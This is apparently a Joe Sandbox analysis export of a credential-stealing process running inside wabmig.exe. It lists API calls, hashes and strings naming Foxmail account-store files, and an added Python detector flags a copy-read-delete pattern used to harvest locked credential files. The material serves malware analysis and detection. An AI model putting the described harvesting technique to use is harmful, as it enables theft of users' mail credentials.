                                                                            Similarity
                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                            • String ID:
                                                                            • API String ID: 776569668-0
                                                                            • Opcode ID: c1dc515f6ef4fa58c5bb3c6e88b704d5ecb2cae48dea2a4e9c71a84759e377f4
                                                                            • Instruction ID: 9ccfb02ab4a77032ac1963f013d1fdbea58d9c71781e797b12f1bf6e54b261ab
                                                                            • Opcode Fuzzy Hash: c1dc515f6ef4fa58c5bb3c6e88b704d5ecb2cae48dea2a4e9c71a84759e377f4
                                                                            • Instruction Fuzzy Hash: 9A11A4BA520248EFCB21DF54DC41CDD3FA9EF15250B2540E1BA0C8B229DA71EB919B80

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 23231D1B
                                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 23231D37
                                                                            • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23231D4B
                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23231D58
                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23231D72
                                                                            • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23231D7D
                                                                            • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23231D8A
                                                                            Memory Dump Source
                                                                            • Source File: 0000000C.00000002.3772969016.0000000023231000.00000040.00001000.00020000.00000000.sdmp, Offset: 23230000, based on PE: true
                                                                            • Associated: 0000000C.00000002.3772946549.0000000023230000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 0000000C.00000002.3772969016.0000000023246000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_12_2_23230000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                            • String ID:
                                                                            • API String ID: 1454806937-0
                                                                            • Opcode ID: 934cb9af19d5c5c5c8ea12ffbf363be39e6f5931298e5a8350620b48083ad47f
                                                                            • Instruction ID: 8766aad2bb596670dbfea043da8ea40b811e68f61f1f470da9861ee06917d932
                                                                            • Opcode Fuzzy Hash: 934cb9af19d5c5c5c8ea12ffbf363be39e6f5931298e5a8350620b48083ad47f
                                                                            • Instruction Fuzzy Hash: F2210EB195122CBFD710ABA08C8CFFB76ACEB29754F0449A6F515D2140D6B4AE868B70
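The call sequence in this function (CopyFileW, then CreateFileW with access 80000000 = GENERIC_READ, share mode 0, disposition 3 = OPEN_EXISTING and attributes 80 = FILE_ATTRIBUTE_NORMAL, then GetFileSize and ReadFile, with DeleteFileW on both the failure path and after the read) is the standard way a stealer reads a credential store that the owning application keeps open: copy the locked file, read the copy, delete the copy. The Python below is an added example written for this page, not Joe Sandbox or Remcos code. It parses function listings in the page's own format, decodes the raw hex CreateFileW parameters, flags that copy/open/read/delete sequence, and also picks out the account-store path strings reported further down for the GetFileAttributesW function at ref 2323122A (\Accounts\Account.rec0, \Data\AccCfg\Accounts.tdat, \Storage\), which are consistent with the Foxmail mail client's account-store layout. The marker list, indicator names and helper names are the example's own assumptions; SAMPLE_REPORT is a constructed excerpt assembled from lines on this page.

```python
"""Scan per-function API listings in this page's Joe Sandbox format for two
credential-theft indicators: the locked-file harvest sequence CopyFileW ->
CreateFileW(GENERIC_READ, OPEN_EXISTING) -> ReadFile -> DeleteFileW, and strings
naming mail-client account stores. Added example, not Joe Sandbox or Remcos code;
SAMPLE_REPORT is a constructed excerpt of two function listings on this page."""
import re
from collections import namedtuple
GENERIC_READ, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL = 0x80000000, 3, 0x80  # winnt.h / fileapi.h
MAIL_STORE_MARKERS = ("Accounts.tdat", "Account.rec0", "\\Storage\\")  # illustrative list (assumption)
API_LINE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?(?P<api>\w+)\."
    r"(?P<module>\w+)(?:\((?P<args>[^)]*)\),)?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
STRING_LINE = re.compile(r"^\s*•\s*String ID:\s*(?P<value>.*?)\s*$")
# args: int per hex literal, None for '?' (not recovered); subcall: 'Part of subcall function' line
ApiCall = namedtuple("ApiCall", "api module args ref subcall")

def parse_api_line(line):
    """Parse one '• Api.MODULE(args), ref: ADDR' line; None if it is not one."""
    m = API_LINE.match(line)
    if not m:
        return None
    args = [None if t.strip() == "?" else int(t, 16)
            for t in (m.group("args") or "").split(",") if t.strip()]
    return ApiCall(m.group("api"), m.group("module"), args,
                   int(m.group("ref"), 16), m.group("sub") is not None)

def parse_report(text):
    """One {'calls', 'strings'} block per 'APIs' heading, running to the next
    heading so the Similarity section's 'String ID' line lands in the same block."""
    blocks, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = {"calls": [], "strings": []}
            blocks.append(cur)
        elif cur is not None:
            call, s = parse_api_line(line), STRING_LINE.match(line)
            if call:
                cur["calls"].append(call)
            elif s:  # Joe Sandbox joins several strings with '$'
                cur["strings"].extend(p for p in s.group("value").split("$") if p)
    return blocks

def decode_createfile(call):
    """Name the CreateFileW parameters the sandbox recorded as raw hex, or None."""
    if call.api != "CreateFileW" or len(call.args) < 7:
        return None
    access, share, _sec, disp, flags, _tmpl = call.args[1:7]
    return {"read": access is not None and bool(access & GENERIC_READ),
            "exclusive_share": share == 0, "open_existing": disp == OPEN_EXISTING,
            "attribute_normal": flags == FILE_ATTRIBUTE_NORMAL}

HARVEST_STEPS = ("CopyFileW", "CreateFileW", "ReadFile", "DeleteFileW")
def matches_harvest_sequence(block):
    """HARVEST_STEPS in listing order (other calls may sit between them); the
    CreateFileW step must open an existing file for reading."""
    step = 0
    for call in block["calls"]:
        if call.subcall or call.api != HARVEST_STEPS[step]:
            continue
        if call.api == "CreateFileW":
            d = decode_createfile(call)
            if not (d and d["read"] and d["open_existing"]):
                continue
        step += 1
        if step == len(HARVEST_STEPS):
            return True
    return False

def mail_store_strings(block):
    return [s for s in block["strings"] if any(m in s for m in MAIL_STORE_MARKERS)]

def scan(text):
    """One finding per indicator, in block order; 'ref' is the CopyFileW call site."""
    findings = []
    for i, block in enumerate(parse_report(text)):
        if matches_harvest_sequence(block):
            ref = next(c.ref for c in block["calls"] if c.api == "CopyFileW")
            findings.append({"block": i, "indicator": "locked-file copy/read/delete", "ref": ref})
        paths = mail_store_strings(block)
        if paths:
            findings.append({"block": i, "indicator": "mail-client account-store paths", "paths": paths})
    return findings

SAMPLE_REPORT = """\
APIs
• CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 23231D1B
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 23231D37
• DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23231D4B
• GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23231D58
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23231D72
• DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23231D8A
APIs
  • Part of subcall function 23231E89: lstrlenW.KERNEL32(?,?,?,?,?,232310DF,?,?,?,00000000), ref: 23231E9A
• GetFileAttributesW.KERNEL32(?,?,?,?), ref: 2323122A
• String ID: \\Accounts\\Account.rec0$\\Data\\AccCfg\\Accounts.tdat$\\Mail\\$\\Storage\\
"""

if __name__ == "__main__":
    for finding in scan(SAMPLE_REPORT):
        print(finding)
```

Two caveats when using this against a full report. The listing is in call-site address order, so the sequence check is a heuristic over code layout, not an execution trace; confirm a hit with the control-flow graph or a runtime API log before treating it as behaviour. Arguments the sandbox could not recover are shown as ? and parse to None, so a CreateFileW whose access mask was not recovered never satisfies the read/open-existing test. The share mode of 0 on this page's CreateFileW means the temporary copy is opened exclusively; calls made by callees ("Part of subcall function") are parsed but excluded from the sequence so that a helper's own file handling does not count toward the caller's pattern.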

                                                                            Control-flow Graph

                                                                            • Control-flow graph (edge list omitted; executed/not-executed marking not recoverable from the text export): basic blocks 23239492 to 23239644, calling GetConsoleCP, WideCharToMultiByte, WriteFile (two sites) and GetLastError, plus internal functions 23232ada, 23237c19 and 232379e6.
                                                                            APIs
                                                                            • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,23239C07,?,00000000,?,00000000,00000000), ref: 232394D4
                                                                            • __fassign.LIBCMT ref: 2323954F
                                                                            • __fassign.LIBCMT ref: 2323956A
                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 23239590
                                                                            • WriteFile.KERNEL32(?,?,00000000,23239C07,00000000,?,?,?,?,?,?,?,?,?,23239C07,?), ref: 232395AF
                                                                            • WriteFile.KERNEL32(?,?,00000001,23239C07,00000000,?,?,?,?,?,?,?,?,?,23239C07,?), ref: 232395E8
                                                                            Memory Dump Source
                                                                            • Source File: 0000000C.00000002.3772969016.0000000023231000.00000040.00001000.00020000.00000000.sdmp, Offset: 23230000, based on PE: true
                                                                            • Associated: 0000000C.00000002.3772946549.0000000023230000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 0000000C.00000002.3772969016.0000000023246000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_12_2_23230000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                            • String ID:
                                                                            • API String ID: 1324828854-0
                                                                            • Opcode ID: 0e7c68370efea346d9f395cabd72f5c707ab33b924200a7fa5717f014a244c83
                                                                            • Instruction ID: c7035cc1e5dc81377fd29b965f4694de49bf5366e7e5ce4694148e21b34f0e82
                                                                            • Opcode Fuzzy Hash: 0e7c68370efea346d9f395cabd72f5c707ab33b924200a7fa5717f014a244c83
                                                                            • Instruction Fuzzy Hash: 92518EB1900209AFDB10DFA8DC95BDEBBF8EF1A300F14415AEA55E7291D670E981CF60

                                                                            Control-flow Graph

                                                                            • Control-flow graph (edge list omitted; executed/not-executed marking not recoverable from the text export): basic blocks 23233370 to 232334c6, calling internal functions 23233330, 232337a7, 23233790, 23233740, 23233774, 2323bbe0 and 23233758; no Win32 API nodes.
                                                                            APIs
                                                                            • _ValidateLocalCookies.LIBCMT ref: 2323339B
                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 232333A3
                                                                            • _ValidateLocalCookies.LIBCMT ref: 23233431
                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 2323345C
                                                                            • _ValidateLocalCookies.LIBCMT ref: 232334B1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000C.00000002.3772969016.0000000023231000.00000040.00001000.00020000.00000000.sdmp, Offset: 23230000, based on PE: true
                                                                            • Associated: 0000000C.00000002.3772946549.0000000023230000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 0000000C.00000002.3772969016.0000000023246000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_12_2_23230000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                            • String ID: csm
                                                                            • API String ID: 1170836740-1018135373
                                                                            • Opcode ID: 14ad29a9642afbd03331447ffd6270d4c3125e00e915ae49845bc09d8dc7c235
                                                                            • Instruction ID: 35ca6adbcb076da82ae2eee62529fcac9b94f33391a2946efb0b5189a8b2b1a8
                                                                            • Opcode Fuzzy Hash: 14ad29a9642afbd03331447ffd6270d4c3125e00e915ae49845bc09d8dc7c235
                                                                            • Instruction Fuzzy Hash: C34123B4E002099BCB10DF28CD80A8EBBB5AF86324F18C1D5EB149B251C775EB91CB91

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 23239221: _free.LIBCMT ref: 2323924A
                                                                            • _free.LIBCMT ref: 232392AB
                                                                              • Part of subcall function 2323571E: HeapFree.KERNEL32(00000000,00000000,?,2323924F,?,00000000,?,00000000,?,23239276,?,00000007,?,?,23237E5A,?), ref: 23235734
                                                                              • Part of subcall function 2323571E: GetLastError.KERNEL32(?,?,2323924F,?,00000000,?,00000000,?,23239276,?,00000007,?,?,23237E5A,?,?), ref: 23235746
                                                                            • _free.LIBCMT ref: 232392B6
                                                                            • _free.LIBCMT ref: 232392C1
                                                                            • _free.LIBCMT ref: 23239315
                                                                            • _free.LIBCMT ref: 23239320
                                                                            • _free.LIBCMT ref: 2323932B
                                                                            • _free.LIBCMT ref: 23239336
                                                                            Memory Dump Source
                                                                            • Source File: 0000000C.00000002.3772969016.0000000023231000.00000040.00001000.00020000.00000000.sdmp, Offset: 23230000, based on PE: true
                                                                            • Associated: 0000000C.00000002.3772946549.0000000023230000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 0000000C.00000002.3772969016.0000000023246000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_12_2_23230000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                            • String ID:
                                                                            • API String ID: 776569668-0
                                                                            • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                            • Instruction ID: c33ba18601f456365366d09e62547fb4a483682282e6638b9914bd978430d9f2
                                                                            • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                            • Instruction Fuzzy Hash: 4A11B1B1564B08FAD6B0ABB0CC45FCB7BAD9F13300F400864AADD76052DAB4F5804741

                                                                            Control-flow Graph

                                                                            • Control-flow graph (edge list omitted; executed/not-executed marking not recoverable from the text export): basic blocks 23238821 to 23238a3c, calling MultiByteToWideChar (two sites) and WideCharToMultiByte, plus internal functions 23239341, 23232ada, 232356d0, 2323bf20, 23235f19 and 23238801.
                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,23236FFD,00000000,?,?,?,23238A72,?,?,00000100), ref: 2323887B
                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,23238A72,?,?,00000100,5EFC4D8B,?,?), ref: 23238901
                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 232389FB
                                                                            • __freea.LIBCMT ref: 23238A08
                                                                              • Part of subcall function 232356D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 23235702
                                                                            • __freea.LIBCMT ref: 23238A11
                                                                            • __freea.LIBCMT ref: 23238A36
                                                                            Memory Dump Source
                                                                            • Source File: 0000000C.00000002.3772969016.0000000023231000.00000040.00001000.00020000.00000000.sdmp, Offset: 23230000, based on PE: true
                                                                            • Associated: 0000000C.00000002.3772946549.0000000023230000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 0000000C.00000002.3772969016.0000000023246000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_12_2_23230000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                            • String ID:
                                                                            • API String ID: 1414292761-0
                                                                            • Opcode ID: 61bcc2e243c32604999830909a88f68eeab6776b8e9375cae1aff149df58f6db
                                                                            • Instruction ID: ab52bd813a98aa723fd0db42631079af2b11b9f1571c367c173f1b59b87e7fff
                                                                            • Opcode Fuzzy Hash: 61bcc2e243c32604999830909a88f68eeab6776b8e9375cae1aff149df58f6db
                                                                            • Instruction Fuzzy Hash: E45105F261020BAFDB259E60CC80EAB37A9EF56750F1446A9FD04DE140EB74ECD8C690
                                                                            APIs
                                                                            • _strlen.LIBCMT ref: 23231607
                                                                            • _strcat.LIBCMT ref: 2323161D
                                                                            • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,2323190E,?,?,00000000,?,00000000), ref: 23231643
                                                                            • lstrcatW.KERNEL32(?,?,?,?,?,?,2323190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 2323165A
                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,2323190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 23231661
                                                                            • lstrcatW.KERNEL32(00001008,?,?,?,?,?,2323190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 23231686
                                                                            Memory Dump Source
                                                                            • Source File: 0000000C.00000002.3772969016.0000000023231000.00000040.00001000.00020000.00000000.sdmp, Offset: 23230000, based on PE: true
                                                                            • Associated: 0000000C.00000002.3772946549.0000000023230000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 0000000C.00000002.3772969016.0000000023246000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_12_2_23230000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: lstrcatlstrlen$_strcat_strlen
                                                                            • String ID:
                                                                            • API String ID: 1922816806-0
                                                                            • Opcode ID: d6272f39e96a8e277e413205fad5e798a8b807fc08146ab1e208b6fa7e386cb7
                                                                            • Instruction ID: 59154ae6aa7fb697e529c77cb0fc3b487a18027fc2a96bac40dbd9f6d5a10471
                                                                            • Opcode Fuzzy Hash: d6272f39e96a8e277e413205fad5e798a8b807fc08146ab1e208b6fa7e386cb7
                                                                            • Instruction Fuzzy Hash: 9B213A72A00304ABC714EB64DC84EEE77B8EF89710F1480ABE604EB140DB74B58287A5
                                                                            APIs
                                                                            • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 23231038
                                                                            • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 2323104B
                                                                            • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 23231061
                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 23231075
                                                                            • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 23231090
                                                                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 232310B8
                                                                            Memory Dump Source
                                                                            • Source File: 0000000C.00000002.3772969016.0000000023231000.00000040.00001000.00020000.00000000.sdmp, Offset: 23230000, based on PE: true
                                                                            • Associated: 0000000C.00000002.3772946549.0000000023230000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 0000000C.00000002.3772969016.0000000023246000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_12_2_23230000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: lstrlen$AttributesFilelstrcat
                                                                            • String ID:
                                                                            • API String ID: 3594823470-0
                                                                            • Opcode ID: 0dfba8d3870f82e38a3beb8ad8929b1d9b87167a1b5d079e3be87c725702d177
                                                                            • Instruction ID: bf9cc7ce3237399518f21b02f8666020e9ae3c658506145b1076810876a24aea
                                                                            • Opcode Fuzzy Hash: 0dfba8d3870f82e38a3beb8ad8929b1d9b87167a1b5d079e3be87c725702d177
                                                                            • Instruction Fuzzy Hash: C421A1B59003299BCF20FB61DC48EDB376CEF45714F104296E969931A1DA70AAC6CB90
                                                                            APIs
                                                                            • GetLastError.KERNEL32(?,?,23233518,232323F1,23231F17), ref: 23233864
                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 23233872
                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 2323388B
                                                                            • SetLastError.KERNEL32(00000000,?,23233518,232323F1,23231F17), ref: 232338DD
                                                                            Memory Dump Source
                                                                            • Source File: 0000000C.00000002.3772969016.0000000023231000.00000040.00001000.00020000.00000000.sdmp, Offset: 23230000, based on PE: true
                                                                            • Associated: 0000000C.00000002.3772946549.0000000023230000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 0000000C.00000002.3772969016.0000000023246000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_12_2_23230000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLastValue___vcrt_
                                                                            • String ID:
                                                                            • API String ID: 3852720340-0
                                                                            • Opcode ID: 3f842a334aab6af30223e2991f64862de67aea27741588a299166c8246dfb578
                                                                            • Instruction ID: 4c21a6ef885f12d8ce1bd60ccf562dee9e7a6237f35da2b3dd68f4b68598c799
                                                                            • Opcode Fuzzy Hash: 3f842a334aab6af30223e2991f64862de67aea27741588a299166c8246dfb578
                                                                            • Instruction Fuzzy Hash: 800147F26097125EE2103A797E8C9562BA9EFE777072043BAF310980E1EF65DED08304
                                                                            APIs
                                                                            • GetLastError.KERNEL32(?,?,23236C6C), ref: 23235AFA
                                                                            • _free.LIBCMT ref: 23235B2D
                                                                            • _free.LIBCMT ref: 23235B55
                                                                            • SetLastError.KERNEL32(00000000,?,?,23236C6C), ref: 23235B62
                                                                            • SetLastError.KERNEL32(00000000,?,?,23236C6C), ref: 23235B6E
                                                                            • _abort.LIBCMT ref: 23235B74
                                                                            Memory Dump Source
                                                                            • Source File: 0000000C.00000002.3772969016.0000000023231000.00000040.00001000.00020000.00000000.sdmp, Offset: 23230000, based on PE: true
                                                                            • Associated: 0000000C.00000002.3772946549.0000000023230000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 0000000C.00000002.3772969016.0000000023246000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_12_2_23230000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$_free$_abort
                                                                            • String ID:
                                                                            • API String ID: 3160817290-0
                                                                            • Opcode ID: 006aec8d7dae5cd789a04c8779afa515c836a6b3b7707cee181758b1b33cd73b
                                                                            • Instruction ID: 688908a6f9ac6055b0964229afb68fb0c39fcb39c97ac8498f788665fe636d95
                                                                            • Opcode Fuzzy Hash: 006aec8d7dae5cd789a04c8779afa515c836a6b3b7707cee181758b1b33cd73b
                                                                            • Instruction Fuzzy Hash: 6EF0C8F2614701AAC31236346C48E4E266F8FF3A71B3941E5FA1CA7185FE78D5C34168
                                                                            APIs
                                                                              • Part of subcall function 23231E89: lstrlenW.KERNEL32(?,?,?,?,?,232310DF,?,?,?,00000000), ref: 23231E9A
                                                                              • Part of subcall function 23231E89: lstrcatW.KERNEL32(?,?,?,232310DF,?,?,?,00000000), ref: 23231EAC
                                                                              • Part of subcall function 23231E89: lstrlenW.KERNEL32(?,?,232310DF,?,?,?,00000000), ref: 23231EB3
                                                                              • Part of subcall function 23231E89: lstrlenW.KERNEL32(?,?,232310DF,?,?,?,00000000), ref: 23231EC8
                                                                              • Part of subcall function 23231E89: lstrcatW.KERNEL32(?,232310DF,?,232310DF,?,?,?,00000000), ref: 23231ED3
                                                                            • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 2323122A
                                                                              • Part of subcall function 2323173A: _strlen.LIBCMT ref: 23231855
                                                                              • Part of subcall function 2323173A: _strlen.LIBCMT ref: 23231869
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000C.00000002.3772969016.0000000023231000.00000040.00001000.00020000.00000000.sdmp, Offset: 23230000, based on PE: true
                                                                            • Associated: 0000000C.00000002.3772946549.0000000023230000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 0000000C.00000002.3772969016.0000000023246000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_12_2_23230000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                            • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                            • API String ID: 4036392271-1520055953
                                                                            APIs
                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,23234AEA,?,?,23234A8A,?,23242238,0000000C,23234BBD,00000000,00000000), ref: 23234B59
                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 23234B6C
                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,23234AEA,?,?,23234A8A,?,23242238,0000000C,23234BBD,00000000,00000000,00000001,23232082), ref: 23234B8F
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                            • API String ID: 4061214504-1276376045
                                                                            APIs
                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 2323715C
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 2323717F
                                                                              • Part of subcall function 232356D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 23235702
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 232371A5
                                                                            • _free.LIBCMT ref: 232371B8
                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 232371C7
                                                                            Similarity
                                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                            • String ID:
                                                                            • API String ID: 336800556-0
                                                                            APIs
                                                                            • GetLastError.KERNEL32(00000000,?,00000000,2323636D,23235713,00000000,?,23232249,?,?,23231D66,00000000,?,?,00000000), ref: 23235B7F
                                                                            • _free.LIBCMT ref: 23235BB4
                                                                            • _free.LIBCMT ref: 23235BDB
                                                                            • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23235BE8
                                                                            • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23235BF1
                                                                            Similarity
                                                                            • API ID: ErrorLast$_free
                                                                            • String ID:
                                                                            • API String ID: 3170660625-0
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,232310DF,?,?,?,00000000), ref: 23231E9A
                                                                            • lstrcatW.KERNEL32(?,?,?,232310DF,?,?,?,00000000), ref: 23231EAC
                                                                            • lstrlenW.KERNEL32(?,?,232310DF,?,?,?,00000000), ref: 23231EB3
                                                                            • lstrlenW.KERNEL32(?,?,232310DF,?,?,?,00000000), ref: 23231EC8
                                                                            • lstrcatW.KERNEL32(?,232310DF,?,232310DF,?,?,?,00000000), ref: 23231ED3
                                                                            Similarity
                                                                            • API ID: lstrlen$lstrcat
                                                                            • String ID:
                                                                            • API String ID: 493641738-0
                                                                            APIs
                                                                            • _free.LIBCMT ref: 232391D0
                                                                              • Part of subcall function 2323571E: HeapFree.KERNEL32(00000000,00000000,?,2323924F,?,00000000,?,00000000,?,23239276,?,00000007,?,?,23237E5A,?), ref: 23235734
                                                                              • Part of subcall function 2323571E: GetLastError.KERNEL32(?,?,2323924F,?,00000000,?,00000000,?,23239276,?,00000007,?,?,23237E5A,?,?), ref: 23235746
                                                                            • _free.LIBCMT ref: 232391E2
                                                                            • _free.LIBCMT ref: 232391F4
                                                                            • _free.LIBCMT ref: 23239206
                                                                            • _free.LIBCMT ref: 23239218
                                                                            Similarity
                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                            • String ID:
                                                                            • API String ID: 776569668-0
                                                                            APIs
                                                                            • _free.LIBCMT ref: 2323536F
                                                                              • Part of subcall function 2323571E: HeapFree.KERNEL32(00000000,00000000,?,2323924F,?,00000000,?,00000000,?,23239276,?,00000007,?,?,23237E5A,?), ref: 23235734
                                                                              • Part of subcall function 2323571E: GetLastError.KERNEL32(?,?,2323924F,?,00000000,?,00000000,?,23239276,?,00000007,?,?,23237E5A,?,?), ref: 23235746
                                                                            • _free.LIBCMT ref: 23235381
                                                                            • _free.LIBCMT ref: 23235394
                                                                            • _free.LIBCMT ref: 232353A5
                                                                            • _free.LIBCMT ref: 232353B6
                                                                            Similarity
                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                            • String ID:
                                                                            • API String ID: 776569668-0
                                                                            APIs
                                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\windows mail\wabmig.exe,00000104), ref: 23234C1D
                                                                            • _free.LIBCMT ref: 23234CE8
                                                                            • _free.LIBCMT ref: 23234CF2
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: _free$FileModuleName
                                                                            • String ID: C:\Program Files (x86)\windows mail\wabmig.exe
                                                                            • API String ID: 2506810119-137341269
                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,23236FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 23238731
                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 232387BA
                                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 232387CC
                                                                            • __freea.LIBCMT ref: 232387D5
                                                                              • Part of subcall function 232356D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 23235702
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                            • String ID:
                                                                            • API String ID: 2652629310-0
                                                                            APIs
                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,23231D66,00000000,00000000,?,23235C88,23231D66,00000000,00000000,00000000,?,23235E85,00000006,FlsSetValue), ref: 23235D13
